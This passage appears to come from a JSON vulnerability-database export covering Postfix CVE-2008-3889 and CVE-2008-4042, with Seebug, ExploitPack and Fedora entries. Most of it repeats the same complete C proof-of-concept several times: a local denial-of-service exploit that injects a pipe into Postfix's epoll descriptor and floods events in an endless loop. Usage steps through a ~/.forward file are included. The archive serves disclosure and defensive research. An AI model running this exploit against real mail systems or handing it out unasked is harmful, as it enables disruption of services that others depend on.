i, found = 0;\r\n\r\n\tpipe(fds);\r\n\tsprintf(dir, "/proc/%d/fd", getpid());\r\n\tprintf("[*] Opening directory %s\\n", dir);\r\n\tDIR *fd_dir = opendir(dir);\r\n\tstruct dirent *de = readdir(fd_dir);\r\n\r\n\t// We are looking for the eventpoll file descriptor\r\n\twhile (de != NULL) {\r\n\t\tchar link_d[256];\r\n\t\tchar link_f[256];\r\n\t\tmemset(link_d, 0, 256);\r\n\t\tsprintf(link_f, "%s/%s", dir, de->d_name);\r\n\t\treadlink(link_f, link_d, 256);\r\n\t\tif ( strstr(link_d, "eventpoll") ) {\r\n\t\t\tfound = 1;\r\n\t\t\tprintf(" => %s points to %s\\n", de->d_name, link_d);\r\n\t\t\tadd_fd(atoi(de->d_name), fds[0]);\r\n\t\t\t// We can test with more than one triggered event at once\r\n\t\t\tfor (i = 0; i<FDOPEN; i++)\r\n\t\t\t\tadd_fd(atoi(de->d_name),dup(fds[0]));\r\n\t\t}\r\n\t\tde = readdir(fd_dir);\r\n\t}\r\n\tclosedir(fd_dir);\r\n\t\r\n\tif (found == 0) {\r\n\t\tprintf("[!] Are you sure that your postfix is vulnerable?\\n");\r\n\t\tprintf("[!] Are you launching me throw a .forward file?\\n");\r\n\t\texit(0);\r\n\t}\r\n\t\r\n\tprintf("[*] Starting to flood the system!\\n");\r\n\tfflush(stdout);\r\n\tclose(0);\r\n\tclose(1);\r\n\tclose(2);\r\n\r\n\t// This triggers the events\r\n\twhile (1) {\r\n\t\twrite(fds[1], "A",1);\r\n\t\tread(fds[0],&c, 1);\r\n\t}\r\n\r\n\treturn 0;\r\n}\r\n\r\n// milw0rm.com [2008-09-16]\r\n\n ", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-65714"}, {"lastseen": "2017-11-19T21:27:29", "description": "No description provided by source.", "published": "2008-09-17T00:00:00", "type": "seebug", "title": "Postfix < 2.4.9, 2.5.5, 2.6-20080902 (.forward) Local DoS Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-3889", "CVE-2008-4042"], "modified": "2008-09-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-9519", "id": "SSV:9519", "sourceData": "\n /*\r\n * http://www.wekk.net/research/CVE-2008-4042/CVE-2008-4042-exploit.c\r\n * http://www.wekk.net/research/CVE-2008-3889/CVE-2008-3889-exploit.c\r\n *\r\n * Exploit for Postfix 2.4 before 2.4.9, 2.5 before 2.5.5, and 2.6 \r\n * before 2.6-20080902, when used with the Linux 2.6 kernel.\r\n *\r\n * CVE-2008-3889 & CVE-2008-4042\r\n *\r\n * by Albert Sellar\u00e8s <whats[at]wekk[dot]net> - http://www.wekk.net\r\n * and Marc Morata Fit\u00e9 <marc.morata.fite[at]gmail[dot]com> \r\n * 2008-09-16\r\n *\r\n * This Proof of concept creates a pipe and adds it in the postfix's epoll \r\n * file descriptor.\r\n * When the pipe is added, an endless loop will launch lots of events to the \r\n * local and master postfix processes. \r\n * This will slowdown de system a lot.\r\n *\r\n * An example of use:\r\n * 1- Put the content "| ~/CVE-2008-3889-exploit >> /tmp/postfix.log &" (with \r\n * the double quotes) \r\n * in the file ~/.forward\r\n *\r\n * 2- Put the CVE-2008-4042-exploit in your home\r\n * gcc CVE-2008-3889-exploit.c -o CVE-2008-3889-exploit\r\n *\r\n * 3- Send and email to the user\r\n *\r\n * You can see the output at /tmp/postfix.log\r\n */\r\n\r\n\r\n#include <sys/epoll.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <stdio.h>\r\n#include <sys/types.h>\r\n#include <sys/stat.h>\r\n#include <unistd.h>\r\n#include <dirent.h>\r\n#include <errno.h>\r\n\r\n#define FDOPEN 200\r\n\r\n\r\nvoid add_fd(int fde, int fd) {\r\n\tprintf("[*] Adding fd %d to eventpoll %d\\n", fd, fde);\r\n\tstatic struct epoll_event ev;\r\n\tev.events = EPOLLIN|EPOLLOUT|EPOLLPRI|EPOLLERR|EPOLLHUP|EPOLLET;\r\n\terrno =0;\r\n\t// If this is a socket fd, the load is high\r\n\tev.data.u32 = 6;\r\n\tev.data.u64 = 6;\r\n\r\n\tif (epoll_ctl(fde, EPOLL_CTL_ADD, fd, &ev) == 0) {\r\n\t\tprintf(" => Fd %d added!\\n", fd);\r\n\t} else {\r\n\t\tprintf(" => Error (%d) adding fd %d\\n", errno, fd);\r\n\t}\r\n}\r\n\r\nint main(int argc, char *argv[]) {\r\n\r\n\tint fds[2];\r\n\tchar dir[32], c;\r\n\tint i, found = 0;\r\n\r\n\tpipe(fds);\r\n\tsprintf(dir, "/proc/%d/fd", getpid());\r\n\tprintf("[*] Opening directory %s\\n", dir);\r\n\tDIR *fd_dir = opendir(dir);\r\n\tstruct dirent *de = readdir(fd_dir);\r\n\r\n\t// We are looking for the eventpoll file descriptor\r\n\twhile (de != NULL) {\r\n\t\tchar link_d[256];\r\n\t\tchar link_f[256];\r\n\t\tmemset(link_d, 0, 256);\r\n\t\tsprintf(link_f, "%s/%s", dir, de->d_name);\r\n\t\treadlink(link_f, link_d, 256);\r\n\t\tif ( strstr(link_d, "eventpoll") ) {\r\n\t\t\tfound = 1;\r\n\t\t\tprintf(" => %s points to %s\\n", de->d_name, link_d);\r\n\t\t\tadd_fd(atoi(de->d_name), fds[0]);\r\n\t\t\t// We can test with more than one triggered event at once\r\n\t\t\tfor (i = 0; i<FDOPEN; i++)\r\n\t\t\t\tadd_fd(atoi(de->d_name),dup(fds[0]));\r\n\t\t}\r\n\t\tde = readdir(fd_dir);\r\n\t}\r\n\tclosedir(fd_dir);\r\n\t\r\n\tif (found == 0) {\r\n\t\tprintf("[!] Are you sure that your postfix is vulnerable?\\n");\r\n\t\tprintf("[!] Are you launching me throw a .forward file?\\n");\r\n\t\texit(0);\r\n\t}\r\n\t\r\n\tprintf("[*] Starting to flood the system!\\n");\r\n\tfflush(stdout);\r\n\tclose(0);\r\n\tclose(1);\r\n\tclose(2);\r\n\r\n\t// This triggers the events\r\n\twhile (1) {\r\n\t\twrite(fds[1], "A",1);\r\n\t\tread(fds[0],&c, 1);\r\n\t}\r\n\r\n\treturn 0;\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-9519", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-11-19T21:27:27", "description": "No description provided by source.", "published": "2008-09-16T00:00:00", "type": "seebug", "title": "Postfix < 2.4.9\t 2.5.5\t 2.6-20080902 (.forward) Local DoS Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-3889", "CVE-2008-4042"], "modified": "2008-09-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-17332", "id": "SSV:17332", "sourceData": "\n /*\n * http://www.wekk.net/research/CVE-2008-4042/CVE-2008-4042-exploit.c\n * http://www.wekk.net/research/CVE-2008-3889/CVE-2008-3889-exploit.c\n *\n * Exploit for Postfix 2.4 before 2.4.9, 2.5 before 2.5.5, and 2.6 \n * before 2.6-20080902, when used with the Linux 2.6 kernel.\n *\n * CVE-2008-3889 & CVE-2008-4042\n *\n * by Albert Sellar\u00c3\u00a8s <whats[at]wekk[dot]net> - http://www.wekk.net\n * and Marc Morata Fit\u00c3\u00a9 <marc.morata.fite[at]gmail[dot]com> \n * 2008-09-16\n *\n * This Proof of concept creates a pipe and adds it in the postfix's epoll \n * file descriptor.\n * When the pipe is added, an endless loop will launch lots of events to the \n * local and master postfix processes. \n * This will slowdown de system a lot.\n *\n * An example of use:\n * 1- Put the content "| ~/CVE-2008-3889-exploit >> /tmp/postfix.log &" (with \n * the double quotes) \n * in the file ~/.forward\n *\n * 2- Put the CVE-2008-4042-exploit in your home\n * gcc CVE-2008-3889-exploit.c -o CVE-2008-3889-exploit\n *\n * 3- Send and email to the user\n *\n * You can see the output at /tmp/postfix.log\n */\n\n\n#include <sys/epoll.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <stdio.h>\n#include <sys/types.h>\n#include <sys/stat.h>\n#include <unistd.h>\n#include <dirent.h>\n#include <errno.h>\n\n#define FDOPEN 200\n\n\nvoid add_fd(int fde, int fd) {\n\tprintf("[*] Adding fd %d to eventpoll %d\\n", fd, fde);\n\tstatic struct epoll_event ev;\n\tev.events = EPOLLIN|EPOLLOUT|EPOLLPRI|EPOLLERR|EPOLLHUP|EPOLLET;\n\terrno =0;\n\t// If this is a socket fd, the load is high\n\tev.data.u32 = 6;\n\tev.data.u64 = 6;\n\n\tif (epoll_ctl(fde, EPOLL_CTL_ADD, fd, &ev) == 0) {\n\t\tprintf(" => Fd %d added!\\n", fd);\n\t} else {\n\t\tprintf(" => Error (%d) adding fd %d\\n", errno, fd);\n\t}\n}\n\nint main(int argc, char *argv[]) {\n\n\tint fds[2];\n\tchar dir[32], c;\n\tint i, found = 0;\n\n\tpipe(fds);\n\tsprintf(dir, "/proc/%d/fd", getpid());\n\tprintf("[*] Opening directory %s\\n", dir);\n\tDIR *fd_dir = opendir(dir);\n\tstruct dirent *de = readdir(fd_dir);\n\n\t// We are looking for the eventpoll file descriptor\n\twhile (de != NULL) {\n\t\tchar link_d[256];\n\t\tchar link_f[256];\n\t\tmemset(link_d, 0, 256);\n\t\tsprintf(link_f, "%s/%s", dir, de->d_name);\n\t\treadlink(link_f, link_d, 256);\n\t\tif ( strstr(link_d, "eventpoll") ) {\n\t\t\tfound = 1;\n\t\t\tprintf(" => %s points to %s\\n", de->d_name, link_d);\n\t\t\tadd_fd(atoi(de->d_name), fds[0]);\n\t\t\t// We can test with more than one triggered event at once\n\t\t\tfor (i = 0; i<FDOPEN; i++)\n\t\t\t\tadd_fd(atoi(de->d_name),dup(fds[0]));\n\t\t}\n\t\tde = readdir(fd_dir);\n\t}\n\tclosedir(fd_dir);\n\t\n\tif (found == 0) {\n\t\tprintf("[!] Are you sure that your postfix is vulnerable?\\n");\n\t\tprintf("[!] Are you launching me throw a .forward file?\\n");\n\t\texit(0);\n\t}\n\t\n\tprintf("[*] Starting to flood the system!\\n");\n\tfflush(stdout);\n\tclose(0);\n\tclose(1);\n\tclose(2);\n\n\t// This triggers the events\n\twhile (1) {\n\t\twrite(fds[1], "A",1);\n\t\tread(fds[0],&c, 1);\n\t}\n\n\treturn 0;\n}\n\n// milw0rm.com [2008-09-16]\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-17332", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:43", "description": "\nPostfix 2.4.92.5.52.6-20080902 - .forward Local Denial of Service", "edition": 1, "published": "2008-09-16T00:00:00", "title": "Postfix 2.4.92.5.52.6-20080902 - .forward Local Denial of Service", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-4042", "CVE-2008-3889"], "modified": "2008-09-16T00:00:00", "id": "EXPLOITPACK:76131FFFA1F8FA883A5D3BB3A352DC3C", "href": "", "sourceData": "/*\n * http://www.wekk.net/research/CVE-2008-4042/CVE-2008-4042-exploit.c\n * http://www.wekk.net/research/CVE-2008-3889/CVE-2008-3889-exploit.c\n *\n * Exploit for Postfix 2.4 before 2.4.9, 2.5 before 2.5.5, and 2.6 \n * before 2.6-20080902, when used with the Linux 2.6 kernel.\n *\n * CVE-2008-3889 & CVE-2008-4042\n *\n * by Albert Sellar\u00c3\u00a8s <whats[at]wekk[dot]net> - http://www.wekk.net\n * and Marc Morata Fit\u00c3\u00a9 <marc.morata.fite[at]gmail[dot]com> \n * 2008-09-16\n *\n * This Proof of concept creates a pipe and adds it in the postfix's epoll \n * file descriptor.\n * When the pipe is added, an endless loop will launch lots of events to the \n * local and master postfix processes. \n * This will slowdown de system a lot.\n *\n * An example of use:\n * 1- Put the content \"| ~/CVE-2008-3889-exploit >> /tmp/postfix.log &\" (with \n * the double quotes) \n * in the file ~/.forward\n *\n * 2- Put the CVE-2008-4042-exploit in your home\n * gcc CVE-2008-3889-exploit.c -o CVE-2008-3889-exploit\n *\n * 3- Send and email to the user\n *\n * You can see the output at /tmp/postfix.log\n */\n\n\n#include <sys/epoll.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <stdio.h>\n#include <sys/types.h>\n#include <sys/stat.h>\n#include <unistd.h>\n#include <dirent.h>\n#include <errno.h>\n\n#define FDOPEN 200\n\n\nvoid add_fd(int fde, int fd) {\n\tprintf(\"[*] Adding fd %d to eventpoll %d\\n\", fd, fde);\n\tstatic struct epoll_event ev;\n\tev.events = EPOLLIN|EPOLLOUT|EPOLLPRI|EPOLLERR|EPOLLHUP|EPOLLET;\n\terrno =0;\n\t// If this is a socket fd, the load is high\n\tev.data.u32 = 6;\n\tev.data.u64 = 6;\n\n\tif (epoll_ctl(fde, EPOLL_CTL_ADD, fd, &ev) == 0) {\n\t\tprintf(\" => Fd %d added!\\n\", fd);\n\t} else {\n\t\tprintf(\" => Error (%d) adding fd %d\\n\", errno, fd);\n\t}\n}\n\nint main(int argc, char *argv[]) {\n\n\tint fds[2];\n\tchar dir[32], c;\n\tint i, found = 0;\n\n\tpipe(fds);\n\tsprintf(dir, \"/proc/%d/fd\", getpid());\n\tprintf(\"[*] Opening directory %s\\n\", dir);\n\tDIR *fd_dir = opendir(dir);\n\tstruct dirent *de = readdir(fd_dir);\n\n\t// We are looking for the eventpoll file descriptor\n\twhile (de != NULL) {\n\t\tchar link_d[256];\n\t\tchar link_f[256];\n\t\tmemset(link_d, 0, 256);\n\t\tsprintf(link_f, \"%s/%s\", dir, de->d_name);\n\t\treadlink(link_f, link_d, 256);\n\t\tif ( strstr(link_d, \"eventpoll\") ) {\n\t\t\tfound = 1;\n\t\t\tprintf(\" => %s points to %s\\n\", de->d_name, link_d);\n\t\t\tadd_fd(atoi(de->d_name), fds[0]);\n\t\t\t// We can test with more than one triggered event at once\n\t\t\tfor (i = 0; i<FDOPEN; i++)\n\t\t\t\tadd_fd(atoi(de->d_name),dup(fds[0]));\n\t\t}\n\t\tde = readdir(fd_dir);\n\t}\n\tclosedir(fd_dir);\n\t\n\tif (found == 0) {\n\t\tprintf(\"[!] Are you sure that your postfix is vulnerable?\\n\");\n\t\tprintf(\"[!] Are you launching me throw a .forward file?\\n\");\n\t\texit(0);\n\t}\n\t\n\tprintf(\"[*] Starting to flood the system!\\n\");\n\tfflush(stdout);\n\tclose(0);\n\tclose(1);\n\tclose(2);\n\n\t// This triggers the events\n\twhile (1) {\n\t\twrite(fds[1], \"A\",1);\n\t\tread(fds[0],&c, 1);\n\t}\n\n\treturn 0;\n}\n\n// milw0rm.com [2008-09-16]", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2936", "CVE-2008-2937", "CVE-2008-3889"], "description": "Postfix is a Mail Transport Agent (MTA), supporting LDAP, SMTP AUTH (SASL), TLS ", "modified": "2008-10-09T21:31:27", "published": "2008-10-09T21:31:27", "id": "FEDORA:5F8CF208974", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 8 Update: postfix-2.5.5-1.fc8", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2936", "CVE-2008-2937", "CVE-2008-3889"], "description": "Postfix is a Mail Transport Agent (MTA), supporting LDAP, SMTP AUTH (SASL), TLS ", "modified": "2008-10-09T21:33:24", "published": "2008-10-09T21:33:24", "id": "FEDORA:71804208749", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 9 Update: postfix-2.5.5-1.fc9", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}]}